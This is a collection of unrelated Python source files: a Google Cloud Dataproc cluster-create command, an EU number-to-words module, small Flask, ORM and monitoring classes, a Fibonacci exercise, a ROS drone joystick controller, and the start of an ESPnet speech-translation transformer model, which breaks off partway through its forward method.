"""Create cluster command."""
from googlecloudsdk.api_lib.dataproc import compute_helpers
from googlecloudsdk.api_lib.dataproc import constants
from googlecloudsdk.api_lib.dataproc import dataproc as dp
from googlecloudsdk.api_lib.dataproc import util
from googlecloudsdk.calliope import actions
from googlecloudsdk.calliope import arg_parsers
from googlecloudsdk.calliope import base
from googlecloudsdk.calliope import exceptions
from googlecloudsdk.command_lib.dataproc import clusters
from googlecloudsdk.command_lib.dataproc import flags
from googlecloudsdk.command_lib.util.args import labels_util
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
def _CommonArgs(parser, beta=False):
"""Register flags common to all tracks."""
base.ASYNC_FLAG.AddToParser(parser)
parser.add_argument('name', help='The name of this cluster.')
clusters.ArgsForClusterRef(parser, beta)
@base.ReleaseTracks(base.ReleaseTrack.GA)
class Create(base.CreateCommand):
"""Create a cluster."""
detailed_help = {
'EXAMPLES': """\
To create a cluster, run:
$ {command} my_cluster
"""
}
@staticmethod
def Args(parser):
_CommonArgs(parser, beta=False)
parser.add_argument(
'--zone',
'-z',
help='The compute zone (e.g. us-central1-a) for the cluster.',
action=actions.StoreProperty(properties.VALUES.compute.zone))
@staticmethod
def ValidateArgs(args):
if args.single_node:
# --num-workers and --num-preemptible-workers must be None (unspecified)
# or 0
if args.num_workers:
raise exceptions.ConflictingArgumentsException(
'--single-node', '--num-workers')
if args.num_preemptible_workers:
raise exceptions.ConflictingArgumentsException(
'--single-node', '--num-preemptible-workers')
if constants.ALLOW_ZERO_WORKERS_PROPERTY in args.properties:
raise exceptions.InvalidArgumentException(
'--properties',
'Instead of %s, use gcloud beta dataproc clusters create '
'--single-node to deploy single node clusters' %
constants.ALLOW_ZERO_WORKERS_PROPERTY)
def Run(self, args):
self.ValidateArgs(args)
dataproc = dp.Dataproc(self.ReleaseTrack())
cluster_ref = util.ParseCluster(args.name, dataproc)
compute_resources = compute_helpers.GetComputeResources(
self.ReleaseTrack(), args.name)
beta = self.ReleaseTrack() == base.ReleaseTrack.BETA
cluster_config = clusters.GetClusterConfig(
args, dataproc, cluster_ref.projectId, compute_resources, beta)
cluster = dataproc.messages.Cluster(
config=cluster_config,
clusterName=cluster_ref.clusterName,
projectId=cluster_ref.projectId)
self.ConfigureCluster(dataproc.messages, args, cluster)
operation = dataproc.client.projects_regions_clusters.Create(
dataproc.messages.DataprocProjectsRegionsClustersCreateRequest(
projectId=cluster_ref.projectId,
region=cluster_ref.region,
cluster=cluster))
if args.async:
log.status.write(
'Creating [{0}] with operation [{1}].'.format(
cluster_ref, operation.name))
return
operation = util.WaitForOperation(
dataproc,
operation,
message='Waiting for cluster creation operation',
timeout_s=args.timeout)
get_request = dataproc.messages.DataprocProjectsRegionsClustersGetRequest(
projectId=cluster_ref.projectId,
region=cluster_ref.region,
clusterName=cluster_ref.clusterName)
cluster = dataproc.client.projects_regions_clusters.Get(get_request)
if cluster.status.state == (
dataproc.messages.ClusterStatus.StateValueValuesEnum.RUNNING):
zone_uri = cluster.config.gceClusterConfig.zoneUri
zone_short_name = zone_uri.split('/')[-1]
# Log the URL of the cluster
log.CreatedResource(
cluster_ref,
# Also indicate which zone the cluster was placed in. This is helpful
# if the server picked a zone (auto zone)
details='Cluster placed in zone [{0}]'.format(zone_short_name))
else:
log.error('Create cluster failed!')
if operation.details:
log.error('Details:\n' + operation.details)
return cluster
@staticmethod
def ConfigureCluster(messages, args, cluster):
"""Performs any additional configuration of the cluster."""
cluster.labels = labels_util.ParseCreateArgs(args,
messages.Cluster.LabelsValue)
@base.ReleaseTracks(base.ReleaseTrack.BETA)
class CreateBeta(Create):
"""Create a cluster."""
@staticmethod
def Args(parser):
_CommonArgs(parser, beta=True)
flags.AddMinCpuPlatformArgs(parser, base.ReleaseTrack.BETA)
parser.add_argument(
'--zone',
'-z',
help="""
The compute zone (e.g. us-central1-a) for the cluster. If empty,
and --region is set to a value other than 'global', the server will
pick a zone in the region.
""",
action=actions.StoreProperty(properties.VALUES.compute.zone))
parser.add_argument(
'--max-idle',
type=arg_parsers.Duration(),
help="""\
The duration before cluster is auto-deleted after last job completes,
such as "2h" or "1d".
See $ gcloud topic datetimes for information on duration formats.
""")
auto_delete_group = parser.add_mutually_exclusive_group()
auto_delete_group.add_argument(
'--max-age',
type=arg_parsers.Duration(),
help="""\
The lifespan of the cluster before it is auto-deleted, such as
"2h" or "1d".
See $ gcloud topic datetimes for information on duration formats.
""")
auto_delete_group.add_argument(
'--expiration-time',
type=arg_parsers.Datetime.Parse,
help="""\
The time when cluster will be auto-deleted, such as
"2017-08-29T18:52:51.142Z". See $ gcloud topic datetimes for
information on time formats.
""")
for instance_type in ('master', 'worker'):
help_msg = """\
Attaches accelerators (e.g. GPUs) to the {instance_type}
instance(s).
""".format(instance_type=instance_type)
if instance_type == 'worker':
help_msg += """
Note:
No accelerators will be attached to preemptible workers, because
preemptible VMs do not support accelerators.
"""
help_msg += """
*type*::: The specific type (e.g. nvidia-tesla-k80 for nVidia Tesla
K80) of accelerator to attach to the instances. Use 'gcloud compute
accelerator-types list' to learn about all available accelerator
types.
*count*::: The number of pieces of the accelerator to attach to each
of the instances. The default value is 1.
"""
parser.add_argument(
'--{0}-accelerator'.format(instance_type),
type=arg_parsers.ArgDict(spec={
'type': str,
'count': int,
}),
metavar='type=TYPE,[count=COUNT]',
help=help_msg)
@staticmethod
def ValidateArgs(args):
super(CreateBeta, CreateBeta).ValidateArgs(args)
if args.master_accelerator and 'type' not in args.master_accelerator:
raise exceptions.InvalidArgumentException(
'--master-accelerator', 'accelerator type must be specified. '
'e.g. --master-accelerator type=nvidia-tesla-k80,count=2')
if args.worker_accelerator and 'type' not in args.worker_accelerator:
raise exceptions.InvalidArgumentException(
'--worker-accelerator', 'accelerator type must be specified. '
'e.g. --worker-accelerator type=nvidia-tesla-k80,count=2')
|
#This file is part of numword. The COPYRIGHT file at the top level of
#this repository contains the full copyright notices and license terms.
'''
numword for EU
'''
from .numword_base import NumWordBase
class NumWordEU(NumWordBase):
'''
NumWord EU
'''
def _set_high_numwords(self, high):
'''
Set high num words
'''
max_val = 3 + 6 * len(high)
for word, i in zip(high, list(range(max_val, 3, -6))):
self.cards[10 ** i] = word + "illiard"
self.cards[10 ** (i - 3)] = word + "illion"
def _base_setup(self):
'''
Base setup
'''
lows = [
"non",
"oct",
"sept",
"sext",
"quint",
"quadr",
"tr",
"b",
"m",
]
units = [
"",
"un",
"duo",
"tre",
"quattuor",
"quin",
"sex",
"sept",
"octo",
"novem",
]
tens = [
"dec",
"vigint",
"trigint",
"quadragint",
"quinquagint",
"sexagint",
"septuagint",
"octogint",
"nonagint",
]
self.high_numwords = (["cent"]
+ self._gen_high_numwords(units, tens, lows))
def currency(self, value, longval=True, jointxt="", hightxt="Euro/s",
lowtxt="Euro cent/s", space=True):
'''
Convert to currency
'''
return self._split(value, hightxt=hightxt, lowtxt=lowtxt,
jointxt=jointxt, longval=longval, space=space)
def _merge(self, curr, next):
'''
Merge
'''
raise NotImplementedError
|
from .meter import Meter
class Monitor(Meter):
def __init__(self, *args, **kwargs):
super(Monitor, self).__init__(*args, **kwargs)
def monitor(self, rms):
"""Extra monitor actions with RMS values
Custom trigger conditions and actions can be written here as long as
`action=None` is passed to the Monitor(). The Monitor instance will
only execute monitor() as action is disabled.
"""
pass
# The following hooks can be used with as long as
# `action=None` is passed to the Monitor()
def prepopen(self):
"""Extra code before executing the script"""
pass
def postpopen(self):
"""Extra code after executing the script"""
pass
# The following hooks can be used in all cases
def prestop(self):
"""Extra code before stop"""
pass
def poststop(self):
"""Extra code after stop"""
pass
|
# 2.6 last digit of sum of fibonacci
n = int(input())
if n <= 1:
print(n)
quit()
lesser = (n + 2) % 60
if lesser == 1:
print(0)
quit()
elif lesser == 0:
print(9)
quit()
def fibo(n):
a, b = 0, 1
for i in range(2, lesser + 1):
c = a + b
c = c % 10
b, a = c, b
if c != 0:
print(c - 1)
else:
print(9)
fibo(lesser)
|
from uuid import uuid4
from django.utils.text import camel_case_to_spaces
from git_orm.models.fields import TextField, CreatedAtField, UpdatedAtField
from django.db.models.options import Options as DjangoOptions
class Options(DjangoOptions):
def __init__(self, meta, app_label=None):
super(Options, self).__init__(meta, app_label)
self.fields = []
self.storage_name = None
self.json_db_name = None
self.has_custom_queryset = False
self.managed = False
def contribute_to_class(self, cls, name):
setattr(cls, name, self)
self.model = cls
self.object_name = cls.__name__
self.model_name = self.object_name.lower()
self.verbose_name = camel_case_to_spaces(self.object_name)
self.storage_name = cls.__name__.lower() + 's'
self.original_attrs = {}
if self.meta:
if hasattr(self.meta, 'storage_name'):
self.storage_name = self.meta.storage_name
if hasattr(self.meta, 'json_db_name'):
self.json_db_name = self.meta.json_db_name
if hasattr(self.meta, 'ordering'):
self.ordering = list(self.meta.ordering)
def add_field(self, field, virtual=False):
self.fields.append(field)
if not self.pk and field.primary_key:
self.pk = field
def get_field(self, name):
for f in self.fields:
if f.name == name:
return f
raise KeyError(
'{} has no field named {}'.format(self.model.__name__, name))
@property
def writable_fields(self):
return [f for f in self.fields if f.attname]
def _prepare(self):
if not self.pk:
id_field = TextField(
primary_key=True, default=lambda: uuid4().hex, auto_created=True)
self.model.add_to_class('id', id_field)
self.fields.insert(0, self.fields.pop())
fieldnames = [f.name for f in self.fields]
if not 'created_at' in fieldnames:
self.model.add_to_class('created_at', CreatedAtField())
if not 'updated_at' in fieldnames:
self.model.add_to_class('updated_at', UpdatedAtField())
|
from flask_wtf import FlaskForm
from wtforms import StringField
from wtforms.validators import DataRequired
class MyForm(FlaskForm):
name = StringField('Enter Text:', validators=[DataRequired()])
|
#!/usr/bin/env python
__author__ = 'broecker'
import rospy
from sensor_msgs.msg import Joy
from geometry_msgs.msg import Twist
from std_srvs.srv import Empty
from sl_crazyflie_srvs.srv import ChangeTargetPose, ChangeTargetPoseRequest, StartWanding
import math
RATE = 50
TIME_OUT = 0.5
CONTROLLER_RP_THRESH = 0.2
UP = 12
DOWN = 14
FORWARD = 4
BACKWARD = 6
LEFT = 7
RIGHT = 5
TAKEOFF = 3
STEP_SIZE = 0.15
WANDING = 0
class MocapController:
def __init__(self):
self.pid_active_button = rospy.get_param("~pid_activate_axis", 11)
self.pid_active = False
self.position_control_active = False
self.cmd_vel_teleop = Twist()
self.cmd_vel_pid = Twist()
self.pid_received = False
self.teleop_received = False
self.pid_last_time = None
self.teleop_last_time = None
self.wanding = False
self.prev_pressed = {'takeoff': False, 'up': False, 'down': False, 'left': False, 'right': False, 'forward': False, 'backward': False, 'wanding': False}
self.hover_stop_srv = rospy.ServiceProxy('hover/stop', Empty)
self.hold_position_start_srv = rospy.ServiceProxy('hover/start_hold_position', Empty)
self.change_target_pose_srv = rospy.ServiceProxy('hover/change_target_pose', ChangeTargetPose)
self.toggle_position_control_srv = rospy.ServiceProxy('hover/toggle_position_control', Empty)
self.start_wanding_srv = rospy.ServiceProxy('hover/start_wanding', StartWanding)
self.stop_wanding_srv = rospy.ServiceProxy('hover/stop_wanding', Empty)
self.cmd_pub = rospy.Publisher('cmd_vel', Twist, queue_size=1)
self.joy_subscriber_ = rospy.Subscriber("joy", Joy, self.joy_callback)
self.velocity_subscriber_teleop = rospy.Subscriber("teleop/cmd_vel", Twist, self.cmd_vel_callback_teleop)
self.velocity_subscriber_pid = rospy.Subscriber("hover/cmd_vel", Twist, self.cmd_vel_callback_pid)
def spin(self):
r = rospy.Rate(RATE)
while not self.teleop_received:
r.sleep()
while not rospy.is_shutdown():
cur_time = rospy.Time.now()
twist = self.cmd_vel_teleop
if (self.pid_active or self.position_control_active) and self.pid_received:
if (cur_time - self.pid_last_time).to_sec() < TIME_OUT:
#pass
twist.linear.z = self.cmd_vel_pid.linear.z
if abs(twist.linear.y) < CONTROLLER_RP_THRESH:
twist.linear.y = self.cmd_vel_pid.linear.y
if abs(twist.linear.x) < CONTROLLER_RP_THRESH:
twist.linear.x = self.cmd_vel_pid.linear.x
else:
twist = Twist()
else:
if (cur_time - self.teleop_last_time).to_sec() > TIME_OUT:
twist = Twist()
self.cmd_pub.publish(twist)
r.sleep()
def joy_callback(self, joy_msgs):
if not joy_msgs.buttons[self.pid_active_button] == 0:
if not self.pid_active:
self.hold_position_start_srv()
self.pid_active = True
else:
if self.pid_active:
self.hover_stop_srv()
self.pid_active = False
if self.is_button_released('takeoff', joy_msgs.buttons[TAKEOFF]):
self.toggle_position_control_srv()
if not self.position_control_active:
self.position_control_active = True
else:
self.position_control_active = False
req = ChangeTargetPoseRequest()
if self.is_button_released('up', joy_msgs.buttons[UP]):
req.pose.position.z = STEP_SIZE
if self.is_button_released('down', joy_msgs.buttons[DOWN]):
req.pose.position.z = -STEP_SIZE
if self.is_button_released('left', joy_msgs.buttons[LEFT]):
req.pose.position.y = STEP_SIZE
if self.is_button_released('right', joy_msgs.buttons[RIGHT]):
req.pose.position.y = -STEP_SIZE
if self.is_button_released('forward', joy_msgs.buttons[FORWARD]):
req.pose.position.x = STEP_SIZE
if self.is_button_released('backward', joy_msgs.buttons[BACKWARD]):
req.pose.position.x = -STEP_SIZE
pose = req.pose.position
if not pose.x == 0 or not pose.y == 0 or not pose.z == 0:
self.change_target_pose_srv(req)
if self.is_button_released('wanding', joy_msgs.buttons[WANDING]):
if self.wanding:
self.stop_wanding_srv()
self.wanding = False
else:
res = self.start_wanding_srv()
self.wanding = res.success
def is_button_released(self, button_name, button_pressed):
if button_pressed:
self.prev_pressed[button_name] = True
elif self.prev_pressed[button_name]:
self.prev_pressed[button_name] = False
return True
return False
def cmd_vel_callback_teleop(self, twist):
self.cmd_vel_teleop = twist
self.teleop_received = True
self.teleop_last_time = rospy.Time.now()
def cmd_vel_callback_pid(self, twist):
self.cmd_vel_pid = twist
self.pid_received = True
self.pid_last_time = rospy.Time.now()
if __name__ == '__main__':
rospy.init_node("mocap_telecop")
cont = MocapController()
cont.spin()
|
"""
Modified by Hang Le
The original copyright is appended below
--
Copyright 2019 Kyoto University (Hirofumi Inaguma)
Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""
"""Transformer model for joint ASR and multilingual ST"""
import logging
import math
import numpy as np
import six
import time
from argparse import Namespace
from distutils.util import strtobool
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.parameter import Parameter
from espnet.nets.pytorch_backend.ctc import CTC
from espnet.nets.pytorch_backend.e2e_asr import CTC_LOSS_THRESHOLD
from espnet.nets.pytorch_backend.e2e_st import Reporter
from espnet.nets.pytorch_backend.e2e_mt import Reporter as MTReporter
from espnet.nets.pytorch_backend.nets_utils import (
get_subsample,
make_pad_mask, pad_list,
th_accuracy,
to_device
)
from espnet.nets.pytorch_backend.transformer.add_sos_eos import add_sos_eos
from espnet.nets.pytorch_backend.transformer.attention import MultiHeadedAttention
from espnet.nets.pytorch_backend.transformer.decoder import Decoder
from espnet.nets.pytorch_backend.transformer.encoder import Encoder
from espnet.nets.pytorch_backend.transformer.initializer import initialize
from espnet.nets.pytorch_backend.transformer.label_smoothing_loss import LabelSmoothingLoss
from espnet.nets.pytorch_backend.transformer.mask import (
subsequent_mask, create_cross_mask, target_mask
)
from espnet.nets.pytorch_backend.transformer.plot import PlotAttentionReport
from espnet.nets.st_interface import STInterface
from espnet.nets.e2e_asr_common import end_detect
def Embedding(num_embeddings, embedding_dim, padding_idx):
m = nn.Embedding(num_embeddings, embedding_dim, padding_idx=padding_idx)
nn.init.normal_(m.weight, mean=0, std=embedding_dim ** -0.5)
nn.init.constant_(m.weight[padding_idx], 0)
return m
def build_embedding(dictionary, embed_dim, padding_idx=0):
num_embeddings = max(list(dictionary.values())) + 1
emb = Embedding(num_embeddings, embed_dim, padding_idx=padding_idx)
return emb
class E2E(STInterface, torch.nn.Module):
"""E2E module.
:param int idim: dimension of inputs
:param int odim: dimension of outputs
:param Namespace args: argument Namespace containing options
"""
@staticmethod
def add_arguments(parser):
"""Add arguments."""
group = parser.add_argument_group("transformer model setting")
group.add_argument("--transformer-init", type=str, default="pytorch",
choices=["pytorch", "xavier_uniform", "xavier_normal",
"kaiming_uniform", "kaiming_normal"],
help='how to initialize transformer parameters')
group.add_argument("--transformer-input-layer", type=str, default="conv2d",
choices=["conv2d", "linear", "embed"],
help='transformer input layer type')
group.add_argument('--transformer-attn-dropout-rate',
default=None, type=float,
help='dropout in transformer attention. \
Use --dropout-rate if None is set')
group.add_argument('--transformer-lr', default=10.0, type=float,
help='Initial value of learning rate')
group.add_argument('--transformer-warmup-steps', default=25000, type=int,
help='optimizer warmup steps')
group.add_argument('--transformer-length-normalized-loss',
default=True, type=strtobool,
help='normalize loss by length')
group.add_argument('--dropout-rate', default=0.0, type=float,
help='Dropout rate for the encoder')
# Encoder
group.add_argument('--elayers', default=4, type=int,
help='Number of encoder layers \
(for shared recognition part in multi-speaker asr mode)')
group.add_argument('--eunits', '-u', default=300, type=int,
help='Number of encoder hidden units')
# Attention
group.add_argument('--adim', default=320, type=int,
help='Number of attention transformation dimensions')
group.add_argument('--aheads', default=4, type=int,
help='Number of heads for multi head attention')
# Decoder
group.add_argument('--dlayers', default=1, type=int,
help='Number of decoder layers')
group.add_argument('--dunits', default=320, type=int,
help='Number of decoder hidden units')
# Adapters
group.add_argument('--adapter-reduction-factor', default=None, type=float,
help='Reduction factor in bottle neck of adapter modules for decoder')
group.add_argument('--adapter-reduction-factor-enc', default=None, type=float,
help='Reduction factor in bottle neck of adapter modules for encoder')
group.add_argument('--adapter-before-src-attn', default=False, type=strtobool,
help='Add adapter before src attn module in decoder')
group.add_argument('--adapter-after-mha', default=False, type=strtobool,
help='Add adapter after multi-head attention')
group.add_argument('--use-shared-adapters', default=False, type=strtobool,
help='Shared adapters')
group.add_argument('--use-shared-adapters-enc', default=False, type=strtobool,
help='Shared adapters for encoder')
return parser
@property
def attention_plot_class(self):
"""Return PlotAttentionReport."""
return PlotAttentionReport
def __init__(self, idim, odim_tgt, odim_src, args, ignore_id=-1):
"""Construct an E2E object.
:param int idim: dimension of inputs
:param int odim: dimension of outputs
:param Namespace args: argument Namespace containing options
"""
torch.nn.Module.__init__(self)
if args.transformer_attn_dropout_rate is None:
args.transformer_attn_dropout_rate = args.dropout_rate
# special tokens and model dimensions
self.pad = 0
self.sos_tgt = odim_tgt - 1
self.eos_tgt = odim_tgt - 1
self.sos_src = odim_src - 1
self.eos_src = odim_src - 1
self.odim_tgt = odim_tgt
self.odim_src = odim_src
self.idim = idim
self.adim = args.adim
self.ignore_id = ignore_id
# submodule
self.mtlalpha = getattr(args, "mtlalpha", 0.0)
self.asr_weight = getattr(args, "asr_weight", 0.0)
self.mt_weight = getattr(args, "mt_weight", 0.0)
self.num_decoders = getattr(args, "num_decoders", 2)
self.do_st = getattr(args, "do_st", True)
self.do_mt = getattr(args, "do_mt", self.mt_weight > 0.0)
self.do_asr = self.asr_weight > 0 and self.mtlalpha < 1
# cross-attention parameters
self.cross_weight = getattr(args, "cross_weight", 0.0)
self.cross_self = getattr(args, "cross_self", False)
self.cross_src = getattr(args, "cross_src", False)
self.cross_operator = getattr(args, "cross_operator", None)
self.cross_to_asr = getattr(args, "cross_to_asr", False)
self.cross_to_st = getattr(args, "cross_to_st", False)
self.wait_k_asr = getattr(args, "wait_k_asr", 0)
self.wait_k_st = getattr(args, "wait_k_st", 0)
self.cross_src_from = getattr(args, "cross_src_from", "embedding")
self.cross_self_from = getattr(args, "cross_self_from", "embedding")
self.cross_shared = getattr(args, "cross_shared", False)
self.cross_weight_learnable = getattr(args, "cross_weight_learnable", False)
# one-to-many models parameters
self.use_joint_dict = getattr(args, "use_joint_dict", True)
self.one_to_many = getattr(args, "one_to_many", False)
self.use_lid = getattr(args, "use_lid", False)
if self.use_joint_dict:
self.langs_dict = getattr(args, "langs_dict_tgt", None)
self.lang_tok = getattr(args, "lang_tok", None)
self.lang_tok_mt = getattr(args, "lang_tok_mt", None)
self.subsample = get_subsample(args,
mode='mt' if self.do_mt else 'st',
arch='transformer')
self.reporter = MTReporter() if self.do_mt else Reporter()
self.normalize_before = getattr(args, "normalize_before", True)
# Backward compatability
if self.cross_operator in ["sum", "concat"]:
if self.cross_self and self.cross_src:
self.cross_operator = "self_src" + self.cross_operator
elif self.cross_self:
self.cross_operator = "self_" + self.cross_operator
elif self.cross_src:
self.cross_operator = "src_" + self.cross_operator
if self.cross_operator:
assert self.cross_operator in ['self_sum', 'self_concat', 'src_sum',
'src_concat', 'self_src_sum', 'self_src_concat']
# Check parameters
if self.one_to_many:
self.use_lid = True
if not self.do_st:
assert (not self.cross_to_asr) and (not self.cross_to_st)
if self.cross_operator and 'sum' in self.cross_operator and self.cross_weight <= 0:
assert (not self.cross_to_asr) and (not self.cross_to_st)
if self.cross_to_asr or self.cross_to_st:
assert self.do_st and self.do_asr
assert self.cross_self or self.cross_src
assert bool(self.cross_operator) == (self.do_asr and (self.cross_to_asr or self.cross_to_st))
if self.cross_src_from != "embedding" or self.cross_self_from != "embedding":
assert self.normalize_before
if self.wait_k_asr > 0:
assert self.wait_k_st == 0
elif self.wait_k_st > 0:
assert self.wait_k_asr == 0
else:
assert self.wait_k_asr == 0
assert self.wait_k_st == 0
logging.info("*** Cross attention parameters ***")
if self.cross_to_asr:
logging.info("| Cross to ASR")
if self.cross_to_st:
logging.info("| Cross to ST")
if self.cross_self:
logging.info("| Cross at Self")
if self.cross_src:
logging.info("| Cross at Source")
if self.cross_to_asr or self.cross_to_st:
logging.info(f'| Cross operator: {self.cross_operator}')
logging.info(f'| Cross sum weight: {self.cross_weight}')
if self.cross_src:
logging.info(f'| Cross source from: {self.cross_src_from}')
if self.cross_self:
logging.info(f'| Cross self from: {self.cross_self_from}')
logging.info(f"Use joint dictionary: {self.use_joint_dict}")
if (self.cross_src_from != "embedding" and self.cross_src) \
and (not self.normalize_before):
logging.warning(f'WARNING: Resort to using \
self.cross_src_from == embedding for cross at source attention.')
if (self.cross_self_from != "embedding" and self.cross_self) \
and (not self.normalize_before):
logging.warning(f'WARNING: Resort to using \
self.cross_self_from == embedding for cross at self attention.')
# Adapters
self.use_adapters = getattr(args, "use_adapters", False)
self.use_adapters_in_enc = getattr(args, "use_adapters_in_enc", False)
adapter_names = getattr(args, "adapters", None)
adapter_reduction_factor = getattr(args, "adapter_reduction_factor", None)
adapter_reduction_factor_enc = getattr(args, "adapter_reduction_factor_enc", adapter_reduction_factor)
use_adapters_for_asr = getattr(args, "use_adapters_for_asr", True)
adapter_before_src_attn = getattr(args, "adapter_before_src_attn", False)
adapter_after_mha = getattr(args, "adapter_after_mha", False)
use_shared_adapters = getattr(args, "use_shared_adapters", False)
use_shared_adapters_enc = getattr(args, "use_shared_adapters_enc", False)
# if self.use_adapters and not use_adapters_for_asr:
# assert not self.do_asr or \
# (self.do_asr and self.num_decoders != 1) or \
# (self.do_asr and not self.do_st) # for backward compatibility
if adapter_names:
if self.do_asr and not self.do_st:
adapter_names = [str(args.char_list_src.index(f'<2{l}>')) for l in adapter_names]
else:
adapter_names = [str(args.char_list_tgt.index(f'<2{l}>')) for l in adapter_names]
logging.info(f'| adapters = {adapter_names}')
if self.do_st or self.do_asr:
logging.info(f'Speech encoder')
self.encoder = Encoder(
idim=idim,
attention_dim=args.adim,
attention_heads=args.aheads,
linear_units=args.eunits,
num_blocks=args.elayers,
input_layer=getattr(args, "transformer_input_layer", "conv2d"),
dropout_rate=args.dropout_rate,
positional_dropout_rate=args.dropout_rate,
attention_dropout_rate=args.transformer_attn_dropout_rate,
adapter_names=adapter_names if self.use_adapters_in_enc else None,
reduction_factor=adapter_reduction_factor_enc,
adapter_after_mha=adapter_after_mha,
shared_adapters=use_shared_adapters_enc,
)
if self.do_st:
logging.info('ST decoder')
self.decoder = Decoder(
odim=odim_tgt,
attention_dim=args.adim,
attention_heads=args.aheads,
linear_units=args.dunits,
num_blocks=args.dlayers,
dropout_rate=args.dropout_rate,
positional_dropout_rate=args.dropout_rate,
self_attention_dropout_rate=args.transformer_attn_dropout_rate,
src_attention_dropout_rate=args.transformer_attn_dropout_rate,
normalize_before=self.normalize_before,
cross_operator=self.cross_operator if self.cross_to_st else None,
cross_shared=self.cross_shared,
cross_weight_learnable=self.cross_weight_learnable,
cross_weight=self.cross_weight,
use_output_layer=True if (self.use_joint_dict or \
(self.do_st and not self.do_asr)) else False,
adapter_names=adapter_names,
reduction_factor=adapter_reduction_factor,
adapter_before_src_attn=adapter_before_src_attn,
adapter_after_mha=adapter_after_mha,
shared_adapters=use_shared_adapters,
)
if self.do_asr:
logging.info('ASR decoder')
self.decoder_asr = Decoder(
odim=odim_src,
attention_dim=args.adim,
attention_heads=args.aheads,
linear_units=args.dunits,
num_blocks=args.dlayers,
dropout_rate=args.dropout_rate,
positional_dropout_rate=args.dropout_rate,
self_attention_dropout_rate=args.transformer_attn_dropout_rate,
src_attention_dropout_rate=args.transformer_attn_dropout_rate,
normalize_before=self.normalize_before,
cross_operator=self.cross_operator if self.cross_to_asr else None,
cross_shared=self.cross_shared,
cross_weight_learnable=self.cross_weight_learnable,
cross_weight=self.cross_weight,
use_output_layer=True if (self.use_joint_dict or \
(self.do_asr and not self.do_st)) else False,
adapter_names=adapter_names,
reduction_factor=adapter_reduction_factor,
adapter_before_src_attn=adapter_before_src_attn,
adapter_after_mha=adapter_after_mha,
shared_adapters=use_shared_adapters,
)
if self.num_decoders == 1 and self.do_st:
logging.info('*** Use shared decoders *** ')
self.decoder_asr = self.decoder
if not self.use_joint_dict and (self.do_st and self.do_asr):
self.output_layer = torch.nn.Linear(args.adim, odim_tgt)
self.output_layer_asr = torch.nn.Linear(args.adim, odim_src)
# submodule for MT task
if self.do_mt:
logging.info('MT encoder')
self.encoder_mt = Encoder(
idim=odim_src,
attention_dim=args.adim,
attention_heads=args.aheads,
linear_units=args.dunits,
num_blocks=args.dlayers,
input_layer='embed',
dropout_rate=args.dropout_rate,
positional_dropout_rate=args.dropout_rate,
attention_dropout_rate=args.transformer_attn_dropout_rate,
padding_idx=0
)
if not self.do_st:
logging.info('MT decoder')
self.decoder_mt = Decoder(
odim=odim_tgt,
attention_dim=args.adim,
attention_heads=args.aheads,
linear_units=args.dunits,
num_blocks=args.dlayers,
dropout_rate=args.dropout_rate,
positional_dropout_rate=args.dropout_rate,
self_attention_dropout_rate=args.transformer_attn_dropout_rate,
src_attention_dropout_rate=args.transformer_attn_dropout_rate,
normalize_before=self.normalize_before,
use_output_layer=True,
)
self.reset_parameters(args) # place after the submodule initialization
if self.mtlalpha > 0.0:
self.ctc = CTC(odim_src, args.adim, args.dropout_rate,
ctc_type=args.ctc_type, reduce=True,
zero_infinity=True)
else:
self.ctc = None
if self.asr_weight > 0 and (args.report_cer or args.report_wer):
from espnet.nets.e2e_asr_common import ErrorCalculator
self.error_calculator = ErrorCalculator(args.char_list_src,
args.sym_space, args.sym_blank,
args.report_cer, args.report_wer)
elif self.do_mt and getattr(args, "report_bleu", False):
from espnet.nets.e2e_mt_common import ErrorCalculator
self.error_calculator = ErrorCalculator(args.char_list_tgt,
args.sym_space,
args.report_bleu)
else:
self.error_calculator = None
self.rnnlm = None
# criterion
if self.do_st:
self.criterion_st = LabelSmoothingLoss(self.odim_tgt, self.ignore_id, args.lsm_weight,
args.transformer_length_normalized_loss)
if self.do_asr:
self.criterion_asr = LabelSmoothingLoss(self.odim_src, self.ignore_id, args.lsm_weight,
args.transformer_length_normalized_loss)
if self.do_mt:
self.criterion_mt = LabelSmoothingLoss(self.odim_tgt, self.ignore_id, args.lsm_weight,
args.transformer_length_normalized_loss)
self.normalize_length = args.transformer_length_normalized_loss # for PPL
# Language embedding layer
if self.lang_tok == "encoder-pre-sum":
self.language_embeddings = build_embedding(self.langs_dict, self.idim,
padding_idx=self.pad)
logging.info(f'language_embeddings: {self.language_embeddings}')
# Backward compatability
if self.cross_operator:
if "sum" in self.cross_operator:
self.cross_operator = "sum"
if "concat" in self.cross_operator:
self.cross_operator = "concat"
def reset_parameters(self, args):
"""Initialize parameters."""
# initialize parameters
logging.info(f'Initialize parameters...')
initialize(self, args.transformer_init)
if self.mt_weight > 0:
logging.info(f'Initialize MT encoder and decoder...')
torch.nn.init.normal_(self.encoder_mt.embed[0].weight,
mean=0, std=args.adim ** -0.5)
torch.nn.init.constant_(self.encoder_mt.embed[0].weight[self.pad], 0)
torch.nn.init.normal_(self.decoder_mt.embed[0].weight,
mean=0, std=args.adim ** -0.5)
torch.nn.init.constant_(self.decoder_mt.embed[0].weight[self.pad], 0)
def forward(self, xs_pad, ilens, ys_pad, ys_pad_src):
"""E2E forward.
:param torch.Tensor xs_pad: batch of padded source sequences (B, Tmax, idim)
:param torch.Tensor ilens: batch of lengths of source sequences (B)
:param torch.Tensor ys_pad: batch of padded target sequences (B, Lmax)
:param torch.Tensor ys_pad_src: batch of padded target sequences (B, Lmax)
:return: ctc loass value
:rtype: torch.Tensor
:return: attention loss value
:rtype: torch.Tensor
:return: accuracy in attention decoder
:rtype: float
"""
# 0. Extract target language ID
tgt_lang_ids, tgt_lang_ids_src = None, None
if self.do_st or self.do_mt:
if self.use_lid: # remove target language ID in the beginning
tgt_lang_ids = ys_pad[:, 0:1]
ys_pad = ys_pad[:, 1:]
ys_in_pad, ys_out_pad = add_sos_eos(ys_pad, self.sos_tgt, self.eos_tgt,
self.ignore_id) # bs x max_lens
if self.lang_tok == "decoder-pre" and self.lang_tok_mt != "pre-src":
ys_in_pad = torch.cat([tgt_lang_ids, ys_in_pad[:, 1:]], dim=1)
ys_mask = target_mask(ys_in_pad, self.ignore_id) # bs x max_lens x max_lens
if self.do_asr or self.do_mt:
if self.use_lid:
tgt_lang_ids_src = ys_pad_src[:, 0:1]
ys_pad_src = ys_pad_src[:, 1:]
